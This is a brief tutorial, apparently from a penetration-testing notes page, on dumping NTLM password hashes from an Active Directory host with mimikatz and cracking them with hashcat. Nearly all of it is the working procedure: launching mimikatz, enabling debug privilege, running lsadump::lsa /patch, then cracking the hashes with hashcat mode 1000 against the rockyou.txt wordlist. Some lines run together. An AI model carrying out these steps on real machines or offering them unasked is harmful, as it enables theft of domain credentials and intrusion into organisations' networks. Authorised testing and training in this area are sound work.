Dumping Hashes with mimikatz
Introduction
Mimikatz is a very popular and powerful post-exploitation tool mainly used for dumping user credentials inside of a active directory network
We'll be focusing on dumping the NTLM hashes with mimikatz and then cracking those hashes using hashcat
Dump Hashes w/ mimikatz
cd Downloads
&& mimikatz.exe this will cd into the directory that mimikatz is kept as well as run the mimikatz binaryprivilege::debug
ensure that the output is "Privilege '20' ok" - This ensures that you're running mimikatz as an administrator; if you don't run mimikatz as an administrator, mimikatz will not run properlylsadump::lsa /patch
Dump those hashes!
Crack those hashes w/ hashcat
hashcat -m 1000 <hash> rockyou.txt
Last updated